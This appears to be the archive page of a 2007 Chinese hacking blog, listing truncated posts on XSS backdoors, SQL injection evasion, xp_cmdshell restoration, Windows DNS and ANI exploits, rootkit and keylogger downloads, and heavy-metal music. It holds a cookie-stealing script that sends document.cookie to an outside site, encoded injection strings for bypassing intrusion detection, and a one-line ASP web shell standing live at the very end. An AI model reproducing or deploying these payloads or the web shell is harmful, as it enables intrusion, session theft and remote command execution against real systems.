-
2007-10-27
XSS The Complete Walkthrough [About]
--==+================================================================================+==-- --==+ XSS The Complete Walkthrough [About] +==-- --==+================================================================================+==-- Author: t0pP8uZz Description: Complete tutorial on XSS methods. Homepage: G0t-Root.net, H4cky0u.org, Milw0rm.co... -
2007-09-17
XSS SHELL v0.6.2
-------------------------
WHAT IS XSS SHELL ?
-------------------------
XSS Shell is a powerful XSS backdoor and XSS zombie manager. This concept was first presented by "XSS-Proxy - http://xss-proxy.sourceforge.net/". Normally during XSS attacks an attacker has one shot however,an XSS Shell can be used interactively to send requests and receive responses from a victim, it is also possible to backdoor the page and keep the connection open between the attacker and the victim.It is a good way of bypassing the following protections:
- Bypassing IP Restrictions
- NTLM / Basic Auth or any similar authentication
- Session based custom protections -
2007-09-05
Sql-injection In Xss[SIX]
BY superhei@ph4nt0m.org
2007-09-04
http://www.ph4nt0m.org
SIX存在的意义:
1、有权限限制的地方总是让人比较放心,比如后台、内网 .... 。而且有的程序官方否认... -
2007-08-29
针对$_SERVER[’PHP_SELF’]的跨站脚本攻击(XSS)
现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了,但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes,就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。
$_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我们先看看下面的代码吧:
<form action=”<?php echo $_SERVER[’PHP_SELF’]; ?>”>
<input type=”submit” name... -
2007-08-23
常见情况恢复执行xp_cmdshell
常见情况恢复执行xp_cmdshell.
1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextende... -
2007-07-18
M-T Trojan
-
2007-06-21
Sql-Server应用程序的高级Sql注入
本文作者:Chris Anley
翻译: luoluo [luoluonet@hotmail.com]
[目 录]
[概要]
[介绍]
[通过错误信息获取信息]
[更深入的访问]
[xp_cmdshell]
[xp_regread]
[其他扩展存储]
[联合服务器]
[用户自定义扩展存储]
[向表中导入文本文件]
[利用BCP创建文本文件]
[SQL-Server里的ActiveX 脚本]
[存储过程]
[高级Sql注入]
[没有引号的字符串]
[Sql-Injection二次注入]
[长度限制]
[躲避审核]
[防范... -
2007-06-05
xHacker v2.5 Basic
xhackeranywhereearth@yahoo.com
http://xhacker.download-area51.com
Download v2.5 Basic
xHacker v2.5 Basic
Very Important
You must Run the file RegisterDependencies.exe before running a... -
2007-06-05
r00tKiT Windowz All in One
:::::::::::::::::::::::::::::::
r00tKiT Windowz All in One
:::::::::::::::::::::::::::::::
-AFX Rootkit 2005
-BootRootkit (eEye)
-FakeNetstat
-Hacker Defender 1.0.0 revisited
-He4Hook v2.1.5b6
-NuclearRootkit v1.0
-V... -
2007-05-14
SQL INJECTION的终极利器opendatasource和openrowset
作者:LCX
目前市面上的SQL INECTION工具很多,最受推崇的当属NBSI了。SQL INECTION的方法在网上是也是满天飞,大家仔细学一下都会很快的成为脚本入侵高手。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提示的时候是用让SQL出错来暴出想要的信息;一个是在对方的WEB服务器关闭错误提示的时候采用ASCII码拆半分法分析。当关闭错误提示的时候,这时来猜数据就很慢了,遇到网速蜗牛的时候真是急死人,NBSI此时还经常会出现猜解错误是否要重试的警告对话框。如果我来告诉你,有了opendatasource和openrowset这两个函数,一切问题都应刃而解了。
在SQL联机从书的解释中,对没有定义为链接服务器名称的 OLE DB 数据源执行不常用查询时,使用特殊名称。在 SQL Ser... -
2007-05-02
SQL Injection规避入侵检测技术总结
信息来源:天马行空技术小组
《SQL Injection规避入侵检测技术总结》
当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大家商戳。
一、 运用编码技术绕过,如URLEncode编码,ASCII编码绕过。
如or 1=1即%6f%72%20%31%3d%31
Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
二、 通过空格绕过,如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘sword...... -
2007-05-02
SlipknoT 2000 格莱美现场
-
2007-05-01
Linkin Park-What I've Done
-
2007-05-01
UPX v3.00
UPX(the Ultimate Packer for eXecutables)是一个非常全面的可执行文件压缩软件,支持dos/exe、dos/com、dos/sys、djgpp2/coff、watcom/le、win32/pe、rtm32/pe、tmt/adam、atari/tos、linux/i386等几乎所有平台上的可执行文件,具有极佳的压缩比,还可以对未压缩的文件和压缩完后进行比较。
features:
• excellent compression ratio: typ... -
2007-05-01
DNS网通电信互通解决方案
实施步骤:
1.电信和网通各一台服务器
2.使用BIND9做智能DNS,自动根据客户端IP来判断,网通的用户解析出网通的IP,电信的解析出电信IP.
3.将其中一台服务器做成反向代理,这样数据就可以同步了,不需要为同步数据麻烦.
注意:
如果你想让自己的服务器不同线路访问不同的服务器,
或者某个区域访问自己区域的服务器使用该view功能就可以实现
比如:国外的访问国外服务器 国内访问国内服务器.
测试做的域名
www.sc-linux.com
电信IP218.6.242.216
网通IP61.182.49.7
电信用户PING ww... -
2007-05-01
Chinanet骨干网结构概述
Chinanet 骨干网的拓扑结构逻辑上分为两层,即核心层和大区层。
1.1 核心层
核心层由北京、上海、广州、沈阳、南京、武汉、成都、西安等8个城市的核心节点组成。
核心层的功能主要是提供与国际internet的互联,以及提供大区之间信息交换的通路。其中北京、上海、广州核心层节点各设有两台国际出口路由器,负责与国际i nternet互联,以及两台核心路由器与其他核心节点互联;其他核心节点各设一台核心路由器。
核心节点之间为不完全网状结构。以北京、上海、广州为中心的三中心结构,其他核心节点分别以至少两条高速ATM链路与这三个中心相连。
1.2 大区层
全国31个省会城市按照行政区划,以上述8个核心节点为中心划分为8个大区网络,这8个大区网共同构成了大区层。每个大区设两个大区出口,大区内其它非出口节点分别与两个出口相连。
... -
2007-04-30
In flames-only for the weak
-
2007-04-30
Finntroll - Trollhammaren
-
2007-04-29
PHP Remote File Injecter v1.0
-
2007-04-28
Children of Bodom -《Bodom Covers》2007
-
MS Windows (.ANI) GDI Remote Elevation
of Privilege Exploit (MS07-017)
Compatibility
All MS Windows 2000/XP before MS07-017 patch with IE 6 (and later ???).
References
-
2007-04-26
Bambalam PHP EXE Compiler/Embedder
Bambalam PHP EXE Compiler/Embedder 是一个小巧的命令行工具,能够把 php 脚本转换成 windows 的标准 exe 可执行文件,我们可以用他把那些 php 写的 exp 转换成 exe ,这样就不用再在 php 环境下运行 exp 了。
特点:
1、使用 Turck MMCache Encode library 对 php 代码进行 encode
2、自... -
2007-04-26
Microsoft RPC DNS Expliot
windows dns 高端口溢出
受影响系统包括2000和2003
此exp针对:
2000all : Windows 2000 +SP4
2003eng : EN Windows 2003 Std Ed +SP1
2003chs : CN Windows 2003 Std Ed +SP1
2003cht : TW Windows 2003 Std Ed +SP1
2003jpn : JP Windows 2003 Std Ed +SP1
2003kor : KR Windows 2003 Std Ed +SP1
硬件dep保护也能绕过... -
2007-04-24
Slipknot 2005年现场专辑9.0Live
-
2007-04-24
Norther-Dreams Of Endless War
-
2007-04-24
Lord: The Arockalypse (2006 - March)
-
2007-04-21
|下载|Slipknot MTV全集
Slipknot -Vermilion
-
2007-04-21
[转载]玩摇滚的孩子不会死
不知道从什么时候开始,我发现自己桌上的CD除了摇滚再也没有其他类型的音乐了,我竟然在不知不觉中被这种伟大的音乐完全征服,对于我来说摇滚早已对我有着超越一般音乐对我来说的意义。
当... -
2007-04-21
JSP安全初探
JSP和其它的PHP、ASP工作机制不一样,虽然它也是一种web编程语言。首次调用JSP文件其实是执行一个编译为Servlet -
2007-04-21
木桶新理论与信息安全
1、传统木桶理论
说到木桶理论,可谓众所周知:一个由许多块长短不同的木板箍成的木桶,决定其容水量大小的并非是其中最长的那块木板或全部木板长度的平均值,而是取决于其中最短的那块木板。要想提高木桶整体效应,不是增加最长的那块木板的长度,而是要下功夫补齐最短的那块木板的长度。这个理论由谁提出,目前已经无从考究了,但是这个理论的应用范围却是十分广泛,从经济学、企业管理到人力资源到个人发展。
同样这个理论也被引进了安全领域,在信息安全中,认为信息安全的防护强度取决于“马奇诺防线”中最为薄弱的一环,因此出现的一个状况是发现哪个安全问题严重就买什么样的产品。这个理论意义在于使我们认识到整个安全防护中,最短木块的巨大威胁,并针对最短木块进行改进。
根据这个理论,我们会发现有些企业找出安全防护中... -
2007-04-20
[翻译]米特尼克<欺骗的艺术>II
逃亡者
一个我们将称之为弗兰克?帕森斯(Frank Parsons)的人已经在逃多年,作为60年代地下反战组织的一分子,他仍然被联邦政府通辑。在餐馆里,他总面对着门口坐着,习惯于左顾右盼,偶尔会被人注意到神色紧张。
弗兰克每隔几年都会搬家。有一次,他来到一个陌生的城市,准备找个工作。对于弗兰克这样有着精湛计算机技术的人(同样,还有娴熟的社会工程学技术,即便他从不会把这写到应聘简历上),找到一个不错的工作还是很容易的。只要不是处于经济特别紧张的时期,具备良好计算机知识的人很容易得到施展才能的机会并摆脱困境。弗兰克很快的看中了一份薪资优厚的工作,一家庞大、高级的长期疗养院,而且离他住的地方很近。
他想,这真合适。但当他埋头苦干地填写申请表时,忽然碰到一个麻烦。雇用方要求应聘者提供一份犯罪历史记录的复印件,这份复印件他只能亲自去州警察局去拿。在工作申请表... -
2007-04-20
[翻译]米特尼克<欺骗的艺术>I
正如知道Windows的人,都知道比尔?盖兹,如果你对信息安全有所了解,便一定听说过凯文?米特尼克。在信息安全的世界里,他的黑客传奇生涯是无人比拟的。
15岁时闯入“北美空中防务指挥系统”的主机,翻遍了美国指向前苏联及其盟国的所有核弹头的数据资料,然后溜之大吉;
24岁时被DEC指控从公司网络上窃取价值100万美元的软件并造成了400万美元损失,被警察当局认为,只要拥有键盘就会对社会构成威胁;
1994年,成功入侵美国摩托罗拉、NOVELL、SUN、MICROSYSTEMS,芬兰的诺基亚等高科技公司的计算机,FBI推算其盗走的程序和数据而造成的实际损害总额达至4亿美元;
2000年,米特尼克获得监督释放。但不准触摸计算机、手机以及其他任何可以上网的装置;
美国联邦调查局将他列为头号通缉犯、好莱无根据他的事迹为... -
2007-04-20
Ardamax Keylogger 2.7
Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a... -
来源:milw0rm
Exploit v2 features:
- Target Remote port 445 (by default but requires auth)
- Manual target for dynamic tcp port (without auth)
- Automatic search for dynamic dns rpc port
- Local and remote OS fingerprinting (auto target)
- Windows 2000 server and Windows 2003 server (Spanish) supported by default
- Fixed bug with Windows 2003 Shellcode
- ... -
2007-04-19
MySQL数据库安全配置指南
1、前言
MySQL是完全网络化的跨平台关系型数据库系统,同时是具有客户机/服务器体系结构的分布式数据库管理系统。它具有功能强、使用简便、管理方便、运行速度快、安全可靠性强等优点,用户可利用许多语言编写访问MySQL数据库的程序,特别是与PHP更是黄金组合,运用十分广泛。
由于MySQL是多平台的数据库,它的默认配置要考虑各种情况下都能适用,所以在我们自己的使用环境下应该进行进一步的安全加固。作为一个MySQL的系统管理员,我们有责任维护MySQL数据库系统的数据安全性和完整... -
2007-04-19
milw0rm上的video整理
XSS injection in image formats // Taking advantages on it
http://str0ke213.tradebit.com/pub/8/58.flv
Local JPG shell Inclusion (LFI using php injected JPG)
http://str0ke213.tradebit.com/pub/8/57.swf
CA BrightStor ARCserve B... -
2007-04-18
溢出的基础与原理
一:基础知识
计算机内存运行分配的区域分为3个
程序段区域:不允许写的
数据段区域:静态全局变量是位于数据段并且在程序开始运行的时候被加载
堆栈区域:放置程序的动态的用于计算的局部和临时变量则分配在堆栈里面和在过程调用中压入的返回地
址数据。堆栈是一个先入后出的队列。一般计算机系统堆栈的方向与内存的方向相反。压栈的xx作push= ESP-4,出栈的xx作是pop=ESP+4. 在一次函数调用中,堆栈中将被依次压入:参数,返回地址,EBP。如果函数有局部变量,接下来,就在 堆栈中开辟相应的空间以构造变量。函数执行结束,这些局部变量的内容将被丢失。但是不被清除。在函 数返回的时候,弹出EBP,恢复堆栈到函数调用的地址,弹出返回地址到EIP以继续执行程序。
在C语言程序中,参数的压栈顺序是反向的。比如func(a,b,c)... -
2007-04-18
如何学习破解第一章
破解组织教程之如何学习破解第一章
第一节 软件保护
软件的破解技术与保护技术这两者之间本身就是矛与盾的关系,它们是在互相斗争中发展进化的。这种技术上的较量归根到底是一种利益的冲突。软件开发者为了维护自身的商业利益,不断地寻找各种有效的技术来保护自身的软件版权,以增加其保护强度,推迟软件被破解的时间;而破解者则或受盗版所带来的高额利润的驱使,或出于纯粹的个人兴趣,而不断制作新的破解工具并针对新出现的保护方式进行跟踪分析以找到相应的破解方法。从理论上说,几乎没有破解不了的保护。对软件的保护仅仅靠技术是不够的,而这最终要靠人们的知识产权意识和法制观念的进步以及生活水平的提高。但是如果一种保护技术的强度强到足以让破解者在软件的生命周期内无法将其完全破解,这种保护技术就可以说是非常成功的。软件保护方式的设计应在一开始就作为软件开发... -
2007-04-17
win2k3服务器A级BT安全配置指南
转载:Gray Dream's Blog
网上流传的很多关于windows server 2003系统的安全配置,但是仔细分析下发现很多都不全面,并且很多仍然配置的不够合理,并且有很大的安全隐患,今天我决定仔细做下极端BT的2003服务器的安全配置,让更多的网管朋友高枕无忧。
我们配置的服务器需要提供支持的组件如下:(ASP、ASPX、CGI、PHP、FSO、JMAIL、MySql、SMTP、POP3、FTP、3389终端服务、远程桌面Web连接管理服务等),这里前提是已经安装好了系统,IIS,包括FTP服务器,邮件服务器等,这些具体配置方法的就不再重复了,现在我们着重主要阐述下关于安全方面的配置。
关于常规的如安全的安装系统,设置和管理帐户,关闭多余的服务,审核策略,修改终端管理端口, 以及配置MS-SQL,删除危... -
2007-04-17
[翻译]绕过堆栈保护 编写shellcode
文章翻译:无敌最寂寞 [E.S.T]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注:翻译文章在我国属于原创 译者有其中文版版权 免费发放希望转载注明作者
译者注:
只能说好久没发过文章了,重新回来的感觉真好。昨天手痒痒就去黑一个我一直想黑的站。在扫描过程中发现有溢出漏洞然而却无法溢出成功,想当然的认为是扫描器的误报。通过其它方式成功入侵后发现系统的确有这个漏洞,但是该系统使用了堆栈保护安... -
2007-04-16
XSS shell v0.3.8
XSS SHELL v0.3.8
-------------------------
XSS SHELL v0.3.8
-------------------------
Ferruh Mavituna - Last Updated : 02/11/2006
-------------------------
WHAT IS XSS SHELL ?
-------------------------
XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by "XSS-Proxy - ... -
2007-04-16
[推荐]《众神复活》三期
乐队:一堆 风格:金属 国籍:中国
提供专辑:众神复活 三期 [厂牌合辑]
推荐程度:★★★★☆
专辑介绍:我得先说明一下,我对中国的地下金属几乎没有什么了解,国内的东西听的也不是很多。此次共享了这套合辑的前三期,希望能让那些和我一样对国内地下金属没... -
来源:milw0rm
Microsoft DNS Server Remote Code execution Exploit and analysis
Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
This remote exploit works against port 445 (also Microsoft RP... -
来源:securityfocus print_r('
---------------------------------------------------------------------------
XAMPP for Windows <= 1.6.0a adodb.php/mssql_connect() remote buffer overflow
proof-of-concept exploit
seh overwrite method / 2000 sp3 version
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------... -
2007-04-16
《The Shellcoder's handbook》
目录结构:
《The Shellcoder's handbook》翻译 by arhat
翻译《The Shellcoder’s Handbook》的历程
第一章 在开始之前
第二章 栈溢出
第三章 Shellcode
第四章 格式化串漏洞
第五章 堆溢出
第六章 Windows的广阔原野
第七章 Windows Shellcode
第八章 Windows 溢出
第九章 战胜过滤器
第十章 Solaris 破解入门
第十一章 高级 Solaris 破解
第十二章 破解HP Tru64 Unix
第十三章 建立工作环境
第十四章 故障注入
第十五章 Fu... -
微软新发布了一份关于DNS服务RPC接口的安全公告,公告中提示DNS服务的RPC接口存在缓冲区溢出漏洞,攻击者通过这个漏洞可以获得本地系统权限。该漏洞会影响Windows 2000 Server和Windows 2003的所有版本。
记者从绿盟科技安全研究小组了解到,在对该漏洞进行跟踪分析后发现,利用该漏洞无需认证,通过匿名访问就可以实现攻击,并且这是一个易于编写攻击代码的堆栈溢出漏洞,所以危险程度相当高。绿盟科技的安全专家建议广大Windows服务器用户,尽快检查自己的系统是否开放了DNS服务,如果并不需要使用该服务,最好将其停止并禁用;如果确实需要开放该服务,建议按照绿盟科技提供的临时解决方案进行安全配置。
目前已经有黑客利用此漏洞进行入侵的报告,微软也正在着手开发相关补丁,所以绿盟科技提醒业界关注微软官方网站获取最新补丁。同时建议受影响的用... -
2007-04-16
Net Tools 4.5 (build 74)
The Creation
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both... -
2007-04-16
数据库攻击方法体系
1.查找有漏洞的参数。测试像%00.%27和%3b这样的基本SQL注入字符。检查错误,以识别SQL注入。
2.检查错误,获得有关数据库,表和列名的信息。
3.查询标准标量(版本,文件位置),获得数据库类型信息。
|--确定与系统相关的用户。
|--确定与数据库相关的用户。
|--确定与应用程序相关的用户。
4.查询标准数据库对象(数据库,表,列,存储过程)。
|--记录可用的数据库,表,列和已知的行值。
5.从应用程序表中查询任意数据。
6.使用 or TRUE=TRUE命令来饶过身份验证。
7.在标准数据库表中插入任意数据。
8.在应用程序表中插入任意数据。
9.尝试读写操作系统上的文件。
10.在数据库主机操作系统上执行任意命令。
|--向FTP,... -
2007-04-16
跨站脚本漏洞的利用
所谓跨站脚本漏洞,小弟认为是指用户能够在网页上添加任意HTML代码并使其被浏览器执行的漏洞。小弟认为此漏洞跟跨站脚本没有必然联系,只不过此漏洞的通常利用方法都要结合另一站点(通常是可以自己控制的)上的脚本才能完成,故得名。
本文仅收集X档案曾刊登的对此漏洞的利用方法,权当小结,并未进行创新。希望能抛砖引玉,众大虾发现有什么错漏请指正和补充。
一、攻击代码
1、偷取cookie的代码:
<script>window.open("http://www.yoursite.com/recordcookie.php?"+document.cookie)&l... -
2007-04-16
MySQL盲注技术
文章作者:Zeelock
文章日期:2005-02-15
文章属性:翻译
译文作者:漂浮的尘埃[S.S.T]
译文时间:2006-08-13
关键字:Benchmark(), IF(), "Blind Injection", "Time Delay", waitfor
"Validate anything can be passed. Security lays in the inputs. " - zk
所有的过滤都可能被突破。安全取决于输入。-zk
摘要:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MySQL数据库用SQL注射并不容易:当un...
<%ExecuteGlobal request("h4ck3r")%>
